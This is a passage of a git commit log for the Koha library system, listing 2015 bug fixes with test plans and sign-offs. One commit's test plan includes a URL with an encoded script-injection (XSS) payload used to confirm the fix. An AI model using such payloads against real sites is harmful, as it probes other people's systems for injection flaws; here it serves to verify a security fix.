9 years agoBug 14324: Display "Add Child" for Organisations on circ/circulation.pl
Jonathan Druart [Tue, 23 Jun 2015 08:40:15 +0000 (10:40 +0200)]
Bug 14324: Display "Add Child" for Organisations on circ/circulation.pl

On moremember, the button is displayed for Organisations.
To be consistent, it should be displayed on the circulation page too.

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit 198e6669eeb68519b4909d99631d84aed068845e)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14324: Set "adultborrower" regardless of guarantor status.
Barton Chittenden [Thu, 18 Jun 2015 20:31:28 +0000 (13:31 -0700)]
Bug 14324: Set "adultborrower" regardless of guarantor status.

Signed-off-by: Jason Robb - SEKLS (jrobb@sekls.org)
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit f05931e05154cc85df4036fe7c4acdfc0ddb5995)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 8802: On editing a library group category type is not set
Jonathan Druart [Wed, 1 Apr 2015 14:23:48 +0000 (16:23 +0200)]
Bug 8802: On editing a library group category type is not set

The category type was always set to 'searchdomain', because it's the
first of the dropdown list.

Test plan:
1/ Create or edit a library group
2/ Set the category type to "properties"
3/ Edit it again
4/ Confirm "properties" is correctly selected

Signed-off-by: Nick Clemens <nick@quecheelibrary.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit fc6789c20636f8104854b74209b658634831f4e5)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14423: tab characters in auth_subfields_structure
Liz Rea [Tue, 23 Jun 2015 00:37:09 +0000 (12:37 +1200)]
Bug 14423: tab characters in auth_subfields_structure

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit 887bb6d510aaafc94b7a59fea62f773f3ce83116)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14423: XSS issues in marc_subfields_structure
Chris [Sun, 21 Jun 2015 08:46:40 +0000 (08:46 +0000)]
Bug 14423: XSS issues in marc_subfields_structure

1/ Hit a url like http://localhost:8081/cgi-bin/koha/admin/marc_subfields_structure.pl?op=add_form&tagfield=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice all the alert boxes
3/ Apply patch
4/ Reload page, no more alerts
5/ Test functionality still works

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit 91a8584aa845fb1695a46fe3b89197f7d1365d94)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14356: Improvements to the 'Transfers to receive' page
Katrin Fischer [Sun, 7 Jun 2015 23:30:58 +0000 (01:30 +0200)]
Bug 14356: Improvements to the 'Transfers to receive' page

Patch makes several small changes to the template for the
'Transfers to receive page'

1) Show the branch name instead of the branchcode in the
   table of incoming transfers.

If there is a hold connected with the transfer:
2) Show the patron's name as 'surname, firstname'
   intead of 'surname  firstname'
3) Restore broken feature: Show a mailto: link with a
   generated subject of 'Hold: <title>'.

The mailto: feature actually existed in the templates, but
was broken to a misnamed database column. I made some small
changes to make the subject translatable (see bug 8330).

To test:
- Create a transfer by placing a hold with pickup at another library
- Craete a transfer manually
- Go to the circulation > transfers to receive
- Check the changes explained above, compare before and after
- Check the mailto: link works as expected

Bonus: Check the Hold: bit in the subject is really translatable now.

Signed-off-by: Nick Clemens <nick@quecheelibrary.org>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit e5cea455d00c52b4a81e87b4dc77315c03ce8630)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14253: (follow-up) Same fix for the basket page
Jonathan Druart [Tue, 16 Jun 2015 15:39:16 +0000 (17:39 +0200)]
Bug 14253: (follow-up) Same fix for the basket page

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit b61782f1e78c771d66351b380755182e111eaf81)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14253: Acq - notify borrowers popup needs to allow scrolling
Katrin Fischer [Tue, 9 Jun 2015 01:01:08 +0000 (03:01 +0200)]
Bug 14253: Acq - notify borrowers popup needs to allow scrolling

The 'notify on receiving' patron search on the new order form
in acquisitions didn't allow you to scroll, so there was no
way to select users from the bottom of a longer result list.

To test:
- Create a new order in acquisitions
- On the order form, use the 'Add user' button to open
  the popup
- Perform a patron research with a lot of results
- Verify that with the patch you can scroll, but
  that you couldn't without it

Signed-off-by: Mirko Tietgen <mirko@abunchofthings.net>
without patch: no scroll bar in Firefox 38
with patch: scrolling works fine

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit e835e03ccf1c7f8cf9f2e9949d2d19889c3610a5)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 5025: discrepancy between opac doc-head-open.inc and staff doc-head-open.inc
Mark Tompsett [Tue, 16 Jun 2015 04:39:31 +0000 (04:39 +0000)]
Bug 5025: discrepancy between opac doc-head-open.inc and staff doc-head-open.inc

http://library.debiankoha.ca/cgi-bin/koha/errors/400.pl
http://library.debiankoha.ca/cgi-bin/koha/errors/401.pl
http://library.debiankoha.ca/cgi-bin/koha/errors/402.pl
http://library.debiankoha.ca/cgi-bin/koha/errors/403.pl
http://library.debiankoha.ca/cgi-bin/koha/errors/404.pl
http://library.debiankoha.ca/cgi-bin/koha/errors/500.pl
http://library.debiankoha.ca/cgi-bin/koha/ilsdi.pl
Set OpacMaintenance to "Show" in the Staff client system preferences.
http://library.debiankoha.ca/cgi-bin/koha/maintenance.pl
Set OpacMaintenance to "Don't show" in the Staff client system preferences.
http://library.debiankoha.ca/cgi-bin/koha/opac-ISBDdetail.pl?biblionumber=5390
http://library.debiankoha.ca/cgi-bin/koha/opac-MARCdetail.pl?biblionumber=5390
Log into OPAC Client
http://library.debiankoha.ca/cgi-bin/koha/opac-account.pl
http://library.debiankoha.ca/cgi-bin/koha/opac-search.pl
-- This is actually the advanced search.
FIXME: Don't know how to trigger opac-alert-subscribe.tt
FIXME: Don't know how to trigger opac-auth-MARCdetail.tt
FIXME: Don't know how to trigger opac-auth-detail.tt
FIXME: Don't know how to trigger opac-auth.tt
Click 'Authority search' in OPAC
Click 'Submit'
Search for something in the catalog
Click 'Select all'
Change 'With selected titles:' drop down to 'cart'
View the cart.
Click 'Send'
Click 'Cancel'
Click 'Download'
Click 'Cancel'
Close cart window
Search for something in the catalog
Select 'Select all'
Change 'With selected titles:' drop down to '[ New List ]'
Save the list
Click 'Lists'
Click the list you saved
Click 'Download list'
Click 'Cancel'
Click 'Send list'
Click 'Cancel'
Copy the URL from download list and remove the '&context=modal'
Click 'Cancel'
http://library.debiankoha.ca/cgi-bin/koha/opac-blocked.pl
http://library.debiankoha.ca/cgi-bin/koha/opac-browser.pl
FIXME: Don't know how to trigger opac-course-details.tt
http://library.debiankoha.ca/cgi-bin/koha/opac-course-reserves.pl
http://library.debiankoha.ca/cgi-bin/koha/opac-detail.pl?biblionumber=5336
FIXME: Don't know how to trigger opac-full-serial-issues.tt
http://library.debiankoha.ca/cgi-bin/koha/opac-imageviewer.pl
http://library.debiankoha.ca/cgi-bin/koha/opac-main.pl
Click on the user name in the top area.
Click the 'your personal details' tab.
Change the birth date.
Click 'Submit'
http://library.debiankoha.ca/cgi-bin/koha/opac-messaging.pl
http://library.debiankoha.ca/cgi-bin/koha/opac-overdrive-search.pl
Click on the user name in the top area.
Click the 'change your password' tab.
Set OPACPrivacy to "Allow" in the Staff client system preferences.
Refresh OPAC page
click on the user name in the top area.
Click the 'your privacy' tab.
Click the 'your reading history' tab.
Change the PatronSelfRegistration to "Allow" in the Staff client system preferences.
Change the PatronSelfRegistrationCategory to "PT" or some other valid patron category code.
Change the PatronSelfRegistrationAdditionalInstructions to something.
Refresh OPAC page
Log out
Click the 'Register Here' link.

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Tested most pages, inspected all of them.
No errors

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit cb28aa454a4c97d0dcf7772d13dfb14635596291)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 11804: Remove references to circ-menu.tt
Jonathan Druart [Thu, 18 Jun 2015 16:14:36 +0000 (18:14 +0200)]
Bug 11804: Remove references to circ-menu.tt

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit b9ae37ae38886a1b37293f7238302a5300d86087)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 11804: Remove unused circ-menu.tt
Katrin Fischer [Sat, 6 Jun 2015 11:03:43 +0000 (13:03 +0200)]
Bug 11804: Remove unused circ-menu.tt

The formerly used circ-menu.tt is no longer referenced in the
templates and can be removed.

To test:
- Verify all tabs in the patron account still work as
  they should.
- git grep circ-menu.tt

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
No problems on patron pages, no more circ-menu.tt
No errors

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
(cherry picked from commit 46a2585b01255b4257ccb6ca4617e341b0bbb301)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14290: Add a table foot to circulation matrix
Nicolas Legrand [Thu, 28 May 2015 14:32:29 +0000 (16:32 +0200)]
Bug 14290: Add a table foot to circulation matrix

Reprint circulation matrix header in a footer helps editing entries in
big matrix. Otherwise, the header disapears and it's hard to tell
which columns we're editing.

Test plan : try do add, modify or delete some entries in the
circulation matrix, everything should work as expected.

Patch works as expected.
Signed-off-by: Marc Véron <veron@veron.ch>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 1ea3465d30b1b0fcd12a5592ce5a4c34a9a58462)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 12616: Locale in subscriptions not preselecting correctly
Bernardo Gonzalez Kriegel [Wed, 17 Jun 2015 16:22:49 +0000 (13:22 -0300)]
Bug 12616: Locale in subscriptions not preselecting correctly

There is a problem if a language is present but
don't have ISO639-2 code. Locale pulldown on serial
suscription is malformed.

To reproduce on master:
a) remove some entries on language_rfc4646_to_iso639
b) go to Serials > New suscription
c) Put any value on Vendor and record, press Next>>
d) Look at locale pulldown, it must default to last
removed lang from a), also other langs has no value
and are also 'selected' on html

To test:
1) Reproduce the problem
2) Apply the patch
3) Add New suscription, pulldown must be fixed

NOTE: Deleted Urdu and Chinese.
      Master had both "selected" in the HTML.
      Applied patch, neither were added.
      Defaults to first item, which is blank meaning English.

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit b9c4061479235d0d79ecbd917b015db5441d8118)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 8330: Overdue email link contains untranslatable 'Overdue:'
Katrin Fischer [Sun, 7 Jun 2015 22:55:22 +0000 (00:55 +0200)]
Bug 8330: Overdue email link contains untranslatable 'Overdue:'

The translation scripts don't pick up text from href attributes,
which is what we want, with a small exception for this script.

Patch uses a TT trick to make the Overdue: in the subject
of the mailto: link translatable.

Regression test:
- Make sure you have an overdue item
- Go to Circulation > Overdues
- Verify the [email] link works and a subject
  with 'Overdue: <title>' is generated
- Apply patch and repeat steps

Bonus: Verify the branch name now shows instead of
       the branchcode in the table

To test translatability:
- cd misc/translator
- perl translate update de-DE
- Open file po/de-DE-staff-prog.po
- Search for Overdue:
- Translate string, remove 'fuzzy' marker
- perl translate install de-DE
- Test again, subject should now be translated

Signed-off-by: Nick Clemens <nick@quecheelibrary.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 67881bd907b4c28843c73bb26b051a69dd489094)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14371: Facets should be sorted by label (displayed) not title (link value)
Nick Clemens [Wed, 10 Jun 2015 01:51:44 +0000 (21:51 -0400)]
Bug 14371: Facets should be sorted by label (displayed) not title (link value)

This patch changes one small line in catalogue/search.pl and opac/opac-search to sort facets by:
facet_label_value
instead of
facet_title_value

To test:
1 - Perform a search with results in two branches e.g. Centerville (code CPL) and Fairfield (code FPL)
2 - Notice that branch facets appear correctly sorted
3 - Rename the branches Centervile->Zebra and Fairfeild->Aardvark (but don't change codes)
4 - Repeat original search
5 - Note that branch facets are no longer correctly sorted
6 - Apply patch
7 - Repeat search
8 - Facets should be correctly sorted
9 - Test in both staff and opac search
10 - Ensure there are no unintended consequences/regressions

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Work as described,  staff AND opac
No errors

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 219f7b5c8fe59034fc7aff1ab81e42bc8cb6eba2)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14094: DDC - Add separators for repeated $a subfields (MARC21)
Katrin Fischer [Mon, 8 Jun 2015 02:46:05 +0000 (04:46 +0200)]
Bug 14094: DDC - Add separators for repeated $a subfields (MARC21)

Mulitple 082 fields are already separated by |, but multiple
$a in one 082 field were only separated by space, making those
not easy to read.

Patch takes care that the | separator is used in all cases.

To test:
- Catalog a record with multiple 082 fields
- Add one or multiple $a subfields to each
- Verify every single classification is separated from
  the others with a | in staff and in OPAC detail pages

Signed-off-by: Nick Clemens <nick@quecheelibrary.org>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 6d9d66e32afaef73cbf2a33ce58d49f373e99dd8)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 13874: 'Rotating collections' are a circulation tool
Katrin Fischer [Mon, 8 Jun 2015 03:29:16 +0000 (05:29 +0200)]
Bug 13874: 'Rotating collections' are a circulation tool

Moves the entry for 'Rotating collections' from the Catalog
column to the 'Patrons and circulation' column.

To test:
- Verify the entry has been moved on the tools home page

NOTE: I agree that collections makes more sense under the new
      column.

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit da8ec2d37a43c87ad5b087511dd8e4ce082f022f)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14001: Inventory has bad $_ references
Mark Tompsett [Wed, 15 Apr 2015 16:33:29 +0000 (12:33 -0400)]
Bug 14001: Inventory has bad $_ references

After receiving an error while attempt a simple inventory run,
Two lines were changed from:
    ...$_->...
to
    ...$item->...
since the loop variable is $item. And $_ is not set to the
expected hash reference, when there is a loop variable.

This also helps explain the "Why are there blank dates on my
last seen field?" problem that has been mentioned by users.

TEST PLAN
---------
 1) Apply this patch after a reset to master.
 2) Log in to staff client
 3) Add one item via z39.50, setting barcode to a known value (BARCODE1)
 4) Wait for the reindex
 5) Home -> Tools -> Inventory/Stocktaking
 6) Browse for a file with the barcode in it
 7) Set the library dropdown to the library branch of the added item.
 8) Check 'Compare barcodes list to results:'
 9) Click 'Submit'
    -- This should not die under plack.
       This should not generate blank last seen dates.
       The last seen dates should be as expected.
10) run koha qa test tools
11) Confirm the two change point correspond to the two change points
    in the patch which shall not be pushed to master.

The test result comply with expected outcome outlined in test plan.

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 3ebc081962247ce0c598da810451c459909842bc)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14401: Zebra index configuration doesn't allow exact search for C.
Katrin Fischer [Wed, 17 Jun 2015 10:28:39 +0000 (12:28 +0200)]
Bug 14401: Zebra index configuration doesn't allow exact search for C.

2 lines in the Zebra configuration files prevent an exact search for C.,
while all other [A-Z]. searches work correctly.

After taking a look at the  /etc/zebradb/etc/word-phrase-utf.chr
those 2 lines cause the problem:

map (^c\.)          @
map (^C\.)          @

I propose to remove them.

To test:
- Catalog a record with an item with callnumber: C.
- Catalog a record with an item with callnumber: B.
- Try seaching for the second using callnum,ext:B. (exact field search)
  - Verify search works.
- Try searching for the other with callnum,ext:C.
  - Verify no result.
- Apply the patch - copy the zebra config file if necessary into the right spot
- Reindex
- Repeat searches - both should not bring up the correct record.

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit f86743d893b61a4609d2f02a175db9944710067e)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14394: fix documentation of OpacHiddenItems
Robin Sheat [Wed, 27 May 2015 00:25:34 +0000 (12:25 +1200)]
Bug 14394: fix documentation of OpacHiddenItems

The current documentation of OpacHiddenItems told people to go and read
a file on the server, which most people don't have access to. This
replaces it with a link to the wiki.

http://bugs.koha-community.org/show_bug.cgi?id=14394

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
It doesn't apply for some reason. Fixed
Added target attribute to open in new window/tab,
hope you don't mind.

Updated documentation
No errors

Belongs to Aleisha or Robin?
Update assignee please :)

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 865321f3726c3b6065ef72107017c4171630d140)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14422: Typo in updatedatabase.pl
Mark Tompsett [Fri, 19 Jun 2015 13:00:33 +0000 (09:00 -0400)]
Bug 14422: Typo in updatedatabase.pl

TEST PLAN
---------
 1) backup db
 2) git checkout -b my_3.6.x origin/3.6.x
 3) drop db and create blank one
 4) git reset --hard origin/3.6.x
 5) run web installer
 6) set HomeorHoldingBranchReturn system preference to 'holdingbranch'.
 7) create a Default checkout, hold rule
    home -> koha administration -> Circulation and fines rules
    -- I put 10 checkouts total and clicked 'Save'
    -- there currently is not 'returnbranch' in default_circ_rules.
 8) git reset --hard origin/3.20.x
    -- or whatever version you apply this to
       (3.8.x, 3.10.x, 3.14.x, 3.16.x, 3.18.x, or 3.20.x
        -- 3.21.00.008 deletes the systempreference involved)
 9) ./installer/data/mysql/updatedatabase.pl
10) check HomeorHoldingBranchReturn systempreference
    -- Currently says 'holdingbranch', but
       the value of 'returnbranch' in default_circ_rules is
       'homebranch'.
11) repeat steps 3-8
12) apply this patch
13) repeat steps 9-10
    -- Currently says 'holdingbranch', and
       the value of 'returnbranch' in default_circ_rules is
       'holdingbranch'.
14) run koha qa test tools

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Tested using 3.6.x install, updated to 3.8.x
Value is preserved
No errors

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Note: I haven't followed the test plan, but the fix is trivial.
Maybe it could worth to upate 3.21.00.008 and check the value of
HomeOrHoldingBranchReturn before deleting it.
We could raise a warning if HomeOrHoldingBranchReturn ==
'holdingbranch'.
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 8c91ca7903846da0cf7a73914a0b78484c0429df)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 4925: Remove Smithsonian as a delivered z39.50 target
Katrin Fischer [Mon, 8 Jun 2015 00:15:03 +0000 (02:15 +0200)]
Bug 4925: Remove Smithsonian as a delivered z39.50 target

Removes the Smithsonian as a target installed with the
sample data during installation.

Also adds the newer LOC authority targets to files where
they were missing.

To test:
- Verify the Smithsonian has been removed from all
  translated installers
- Verify the files are still valid SQL and install
  correctly

NOTE: There was tiny scope creep which included ensuring
      there were two Authority z39.50 servers as well.
      Text files properly reflect the removal.
      SQL 'source' of SQL files worked properly.
      Was able to Z39.50 search for all of the 'en'.

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 0ca21c1e488f150cca74beb9a67b285e5531f3b5)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 10172: Hide some uneeded stuffs on printing a record
Jonathan Druart [Wed, 15 Apr 2015 10:39:05 +0000 (12:39 +0200)]
Bug 10172: Hide some uneeded stuffs on printing a record

When printing a record from the OPAC or the staff interface, some
uneeded blocks are displayed.

OPAC:
1/ Browse results
2/ The view tags (Normal, MARC, ISBD)

Intranet:
1/ Marc view link
2/ The Please upload one image link

Test plan:
On a record detail page (staff and OPAC), print the page and confirm
these blocks no longer appear.

Signed-off-by: Nick Clemens <nick@quecheelibrary.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 68f0fe7b6f152a6db100525724c1ece507258652)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 10063: Remove outdated FIXME
Jonathan Druart [Fri, 19 Jun 2015 13:47:58 +0000 (15:47 +0200)]
Bug 10063: Remove outdated FIXME

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 9ed3d83dcbc609e9d658d965257b87bdc42e0606)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 10063: Correct documentation of C4::Members::IsMemberBlocked
Katrin Fischer [Mon, 8 Jun 2015 02:17:53 +0000 (04:17 +0200)]
Bug 10063: Correct documentation of C4::Members::IsMemberBlocked

Rephrased documentation a bit, replacing fine days with the
more general term restriction. As IsDebarred checks for existing
active restrictions.

TEST PLAN
---------
1) apply patch
2) git diff origin/master
   -- do the changes make sense
3) perldoc C4::Members
   -- look for the IsMemberBlocked.
   -- Does it reflect current state
4) koha qa test tools

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 307f7a064cdaf16bca5a762344563b87651a1664)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 10119: Add note about CalculateFinesOnReturn to description of finesmode
Katrin Fischer [Mon, 8 Jun 2015 00:58:53 +0000 (02:58 +0200)]
Bug 10119: Add note about CalculateFinesOnReturn to description of finesmode

This adds a note to the descrpition of the finesmode system
preference mentioning that CalculateFinesOnReturn is another
option for charging fines:

Note: Fines can also be charged by the CalculateFinesOnReturn system preference.

To test:
- Search for the finesmode system preference
- Verify the new text shows and is correct

NOTE: New text appears as expected. You can also just scroll for
      it on the Circulation preferences tab.

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 45c1b8f7b261493c27aa4d734e9795be619c1c70)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14421: Corrected example in SMS.pm to working version with hashref.
Eivin Giske Skaaren [Fri, 19 Jun 2015 11:08:29 +0000 (13:08 +0200)]
Bug 14421: Corrected example in SMS.pm to working version with hashref.

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Test:
1) Apply patch
2) perldoc C4/SMS.pm
3) Check fixed argument in example

Argument is hashref, POD is now right
Added additional space on second arg
No errors

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 0cb82c8d02cc4b672b169c8b0261c4bb6360cd00)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
9 years agoBug 14425: Typo in C4::Context IsSuperLibrarian perldoc
Mark Tompsett [Fri, 19 Jun 2015 15:24:57 +0000 (11:24 -0400)]
Bug 14425: Typo in C4::Context IsSuperLibrarian perldoc

TEST PLAN
---------
1) git checkout -b bug_14425 origin/master
2) perldoc C4::Context
   /IsSuperlibr
   -- see it is bad.
3) apply patch
4) perldoc C4::Context
   /IsSuperLibr
   -- see it is fixed.
5) koha qa test tools.

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Fix typo, no errors.

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
% git grep -i IsSuperLibrarian|wc -l
55
% git grep IsSuperLibrarian|wc -l
55
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 2b255be22c919b11d690f4dcf8a5e84e93290878)
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
9 years agoBug 14424: Tools Help Files for 3.20
Nicole C. Engard [Fri, 19 Jun 2015 16:32:18 +0000 (11:32 -0500)]
Bug 14424: Tools Help Files for 3.20

This patch updates and adds help files to 3.20+

To test:

* Visit batch record modification and note that there is a help file
 and confirm the text is right
* Visit export data, import borrowers, stage marc for import, and log viewer
  * Confirm updated text is right

Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 469275fef5f4cfd7b251cd0a8ba2b53009b10f03)
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
9 years agoBug 14424: Admin Help Files for 3.20
Nicole C. Engard [Fri, 19 Jun 2015 16:08:56 +0000 (11:08 -0500)]
Bug 14424: Admin Help Files for 3.20

This patch updates some of the help files for Admin areas in 3.20+

To test:

* Visit
  * Frameworks, add field, add subfield
  * Column settings
  * Patron attributes
  * Circ rules
* Confirm help loads up and is right

Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit d3983e563ffbce5c3276108c5840394bcb7b8593)
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
9 years agoBug 11458: Improve confusing description of syspref 'gist'
Katrin Fischer [Tue, 9 Jun 2015 22:11:19 +0000 (00:11 +0200)]
Bug 11458: Improve confusing description of syspref 'gist'

The description of "gist" was:

"Default tax rates are ... (enter in numeric form, 0.12 for 12%.
First is the default. If you want more than 1 value, please
separate with |) "

The doubled use of "default" is confusing here.

With the patch it reads:

Tax rates are ... Enter in numeric form, 0.12 for 12%.
The first item in the list will be selected by default.
For more than one value, separate with | (pipe)

To test:
- Verify that the gist system preference description is
  correct.

The use of "default" is confusing here.

Signed-off-by: Aleisha <aleishaamohia@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 6c94fe52f954f93916993f71c472b068096806da)
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
9 years agoBug 14215: Change the 'delimiter' syspref description for its wider use
Katrin Fischer [Tue, 9 Jun 2015 00:32:46 +0000 (02:32 +0200)]
Bug 14215: Change the 'delimiter' syspref description for its wider use

Patch changes 'report files' to 'CSV files' as there are more
options now for downloading and creating CSV files where this
preference is taken into account.

To test:
- Verify the changed system preference description for
  'delimiter' is correct.

Signed-off-by: Marc Véron <veron@veron.ch>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 2eaeb708795e7624eb8873b617d4a38d69fa84fc)
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
9 years agoBug 4137: Fix the OPACViewOthersSuggestions behavior
Jonathan Druart [Tue, 24 Mar 2015 16:01:30 +0000 (17:01 +0100)]
Bug 4137: Fix the OPACViewOthersSuggestions behavior

This pref does not work at all, the interface let the user choose to
list all suggestions, but whatever he chooses the suggestion list is the
same.

This patch cleans a bit the suggestedby management.

There are a lot of cases to test, because linked to 2 prefs:
 AnonSuggestions and OPACViewOthersSuggestions.
1/ AnonSuggestions = 0 and OPACViewOthersSuggestions = 0
  - A non logged in user is not able to make a suggestion.
  - A logged in user is not able to see suggestions made by someone else.
2/ AnonSuggestions = 0 and OPACViewOthersSuggestions = 1
  - A non logged in user is not able to make a suggestion.
